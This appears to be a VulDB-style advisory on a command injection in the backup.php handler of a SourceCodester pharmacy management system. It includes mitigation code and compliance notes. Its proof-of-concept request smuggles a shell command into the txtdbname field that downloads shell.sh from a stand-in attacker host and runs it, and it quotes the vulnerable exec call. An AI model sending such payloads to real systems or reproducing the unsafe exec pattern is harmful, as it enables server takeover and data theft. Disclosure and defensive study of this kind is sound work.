**Title**: Sourcecodester Web-based Pharmacy Product Management System edit-product v1.0 Command Injection

**Description**:

**Critical Security Advisory: Remote Command Execution in Pharmacy Management System**
**Vulnerability Summary**
Title: Unauthenticated RCE via Database Backup Functionality
Affected Version: Web-based Pharmacy Product Management System ≤ v1.0
Risk Level: Critical (CVSS 9.8)
Discovery: yaklang.io, IRify, Yakit
**Core Vulnerability Analysis**
1. **Insecure Implementation**:
- Backup functionality accepts unvalidated user input for database credentials (servername, username, password, dbname)
- Directly interpolates user-controlled $dbname into:
* File path construction ($backup_file_name)
* System command execution (exec() call)
2. **Attack Chain**:
① Attacker controls all database connection parameters
② Exploits path normalization in file operations
③ Achieves arbitrary command execution via:
```php
exec('rm ' . $backup_file_name); // attacker-controlled $dbname leads to RCE
```
**Technical Impact**
- Full system compromise via arbitrary command execution
- Potential PHI/PII data exfiltration (HIPAA violation)
- Possible ransomware deployment
- Supply chain contamination risk
**Proof of Concept**
```http
POST /backup.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
txtservername=attacker-mysql&txtusername=user&txtpassword=pass&txtdbname=./;curl${IFS}attacker.com/shell.sh${IFS}-o/../tmp/shell;./
```
**Mitigation Strategy**
1. **Immediate Actions**:
- Disable backup.php functionality
- Implement input validation:
```php
$dbname = preg_replace('/[^a-zA-Z0-9_-]/', '', $_POST['txtdbname']);
```
2. **Secure Coding Practices**:
- Use parameterized database connections
- Implement secure file operations:
```php
$backup_dir = '/secured/backups/';
$safe_path = realpath($backup_dir).DIRECTORY_SEPARATOR.basename($dbname).'.sql';
```
3. **System Hardening**:
- Implement least privilege for web server user
- Deploy WAF with command injection rules
- Conduct forensic audit of affected systems
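A hardened version of the backup handler the advisory describes, as an added example that is neither the project's code nor the advisory's: only the validated `txtdbname` field comes from the request, the output path is confined to a fixed directory, and the dump is produced and removed without request data ever reaching a shell. `BACKUP_DIR`, the `$dbConfig` array and the `mysqldump` binary are assumptions.

```php
<?php
// Added example, not the project's code: hardened replacement for the backup
// handler pattern quoted above. Only txtdbname (named in the advisory) comes from
// the request; BACKUP_DIR, $dbConfig and the mysqldump binary are assumptions.

const BACKUP_DIR = '/var/backups/pharmacy';   // assumed; keep it outside the web root
$dbConfig = ['host' => 'localhost', 'user' => 'pharmacy_ro', 'pass' => 'CHANGE_ME']; // assumed, server-side

// Allowlist instead of stripping: reject anything that is not a plain identifier,
// so the ';', '/', '${IFS}' and '..' used in the PoC never reach path or command.
function validateDbName(string $input): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $input) === 1 ? $input : null;
}

// Build the dump path inside BACKUP_DIR and refuse anything that resolves outside it.
function backupPath(string $dbname): ?string
{
    $dir = realpath(BACKUP_DIR);
    if ($dir === false) {
        return null;
    }
    $path = $dir . DIRECTORY_SEPARATOR . basename($dbname) . '.sql';
    return str_starts_with($path, $dir . DIRECTORY_SEPARATOR) ? $path : null;
}

// Every argument is shell-escaped, so no request data is concatenated into the command.
function runBackup(array $cfg, string $dbname, string $outFile): bool
{
    $cmd = 'mysqldump --host=' . escapeshellarg($cfg['host'])
         . ' --user=' . escapeshellarg($cfg['user'])
         . ' --password=' . escapeshellarg($cfg['pass'])
         . ' --result-file=' . escapeshellarg($outFile)
         . ' ' . escapeshellarg($dbname);
    exec($cmd, $output, $status);
    return $status === 0;
}
// Replaces exec('rm ' . $backup_file_name): a filesystem call, not a shell.
function removeBackup(string $outFile): bool
{
    return is_file($outFile) && unlink($outFile);
}

$dbname = validateDbName($_POST['txtdbname'] ?? '');
$path   = $dbname === null ? null : backupPath($dbname);
if ($path === null) {
    http_response_code(400);
    exit('Invalid database name');
}
echo runBackup($dbConfig, $dbname, $path) ? 'Backup written' : 'Backup failed';
```

The `${IFS}`-based payload in the PoC is rejected by `validateDbName` before any path or command is built, and the `--password=` argument would still be visible in the process list, so a `~/.my.cnf` or `MYSQL_PWD` for the web server user is the usual follow-up.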
**Compliance Implications**
This vulnerability constitutes:
- HIPAA Security Rule violation (§164.308)
- PCI DSS Requirement 6.5.1 non-compliance
- GDPR Article 32 breach notification requirement
**References**
- CWE-78: OS Command Injection
- OWASP Top 10 2021: A03 Injection
- NIST SP 800-115: Command Injection Countermeasures
**Note**: This vulnerability enables complete system takeover. Organizations should assume compromise and initiate incident response procedures immediately.

**Source**: https://github.com/yaklang/IRifyScanResult/blob/main/Web-based%20Pharmacy%20Product%20Management%20System/rce_in_backup.md

**User**: lingze (UID 83608)

**Submitted**: 2025-04-08 16:42 (12 months ago)

**Moderated**: 2025-04-16 15:38 (8 days later)

**Status**: Accepted

**VulDB Entry**: 305075 [SourceCodester Web-based Pharmacy Product Management System 1.0 Database Backup backup.php txtdbname privilege escalation]

**Points**: 20